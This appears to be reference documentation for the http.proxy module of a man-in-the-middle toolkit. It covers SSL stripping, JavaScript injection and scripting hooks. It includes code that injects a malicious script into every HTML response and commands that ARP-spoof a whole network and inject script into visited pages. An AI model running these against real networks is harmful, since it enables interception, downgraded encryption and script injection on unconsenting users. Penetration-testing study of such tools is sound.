http.proxy

A full featured HTTP transparent proxy that can be scripted using javascript modules. If used together with a spoofer, all HTTP traffic will be redirected to it and it will automatically handle port redirections as needed.

Commands

http.proxy on

Start the HTTP proxy.

http.proxy off

Stop the HTTP proxy.

Parameters

parameterdefaultdescription
http.port80HTTP port to redirect when the proxy is activated.
http.proxy.address<interface address>Address to bind the HTTP proxy to.
http.proxy.port8080Port to bind the HTTP proxy to.
http.proxy.sslstripfalseEnable or disable SSL stripping.
http.proxy.scriptPath of a proxy module script.
http.proxy.injectjsURL, path or javascript code to inject into every HTML page.
http.proxy.blacklistComma separated list of hostnames to skip while proxying (wildcard expressions can be used).
http.proxy.whitelistComma separated list of hostnames to proxy if the blacklist is used (wildcard expressions can be used).

Modules

The http.proxy and https.proxy modules can be scripted using javascript files that must declare at least one of the following functions:

  1. // called when the script is loaded
  2. function onLoad() {
  4. }
  6. // called when the request is received by the proxy
  7. // and before it is sent to the real server.
  8. function onRequest(req, res) {
  10. }
  12. // called when the request is sent to the real server
  13. // and a response is received
  14. function onResponse(req, res) {
  16. }
  18. // called every time an unknown session command is typed,
  19. // proxy modules can optionally handle custom commands this way:
  20. function onCommand(cmd) {
  21.     if( cmd == "test" ) {
  22.         /*
  23.          * Custom session command logic here.
  24.          */
  26.         // tell the session we handled this command
  27.         return true
  28.     }
  29. }

Modules can change the req request and res response objects, for instance the web-override.cap caplet is using the onRequest function in order to override every request before it is executed with a fake response:

  1. function onRequest(req, res) {
  2.     res.Status      = 200;
  3.     res.ContentType = "text/html";
  4.     res.Body        = readFile("caplets/www/index.html");
  5.     headers         = res.Headers.split("\r\n")
  6.     for (var i = 0; i < headers.length; i++) {
  7.         header_name = headers[i].replace(/:.*/, "")
  8.         res.RemoveHeader(header_name);
  9.     }
  10.     res.SetHeader("Connection", "close");
  11. }

The login-man-abuse.cap caplet instead will use the onResponse handler to inject its malicious javascript file in every html response:

  1. function onResponse(req, res) {
  2.     if( res.ContentType.indexOf('text/html') == 0 ){
  3.         var body = res.ReadBody();
  4.         if( body.indexOf('</head>') != -1 ) {
  5.             res.Body = body.replace( 
  6.                 '</head>', 
  7.                 '<script type="text/javascript">' + "\n" +
  8.                     AbuserJavascript +
  9.                 '</script>' +
  10.                 '</head>'
  11.             ); 
  12.         }
  13.     }
  14. }

Builtin Functions

Modules can use the following builtin functions.

functiondescription
readDir(“/path/“)Return the contents of a directory as a string array.
readFile(“/path/to/file”)Return the contents of a file as a string.
writeFile(“/path/to/file”, “hello world”)Write the string hello world to a file, returns null or an error message.
log_debug(“message”)Log a message in the interactive session (its level will be DEBUG).
log_info(“message”)Log a message in the interactive session (its level will be INFO).
log_warn(“message”)Log a message in the interactive session (its level will be WARNING).
log_error(“message”)Log a message in the interactive session (its level will be ERROR).
log_fatal(“message”)Log a message in the interactive session (its level will be FATAL).
log(“message”)Shortcut for log_info(“message”).
btoa(“message”)Encode a message to base64.
atob(“bWVzc2FnZQ==”)Decode a message from base64.
gzipCompress(“plaintext data”)Compress a string using gzip encoding.
gzipDecompress(“)9�+�I��+I�(QHI,I����”)Decompress a gzip encoded string.
env(“iface.ipv4”)Read a variable.
env(“foo”, “bar”)Set a variable.

Examples

Will ARP spoof the whole network, enable sslstrip and inject a “Hello World” javascript alert to every HTML page being visited:

  1. set http.proxy.injectjs alert("Hello World")
  2. set http.proxy.sslstrip true
  4. http.proxy on
  5. arp.spoof on

Only proxy requests for cnn.com (including subdomains):

  1. set http.proxy.blacklist *
  2. set http.proxy.whitelist cnn.com, *.cnn.com
  3. http.proxy on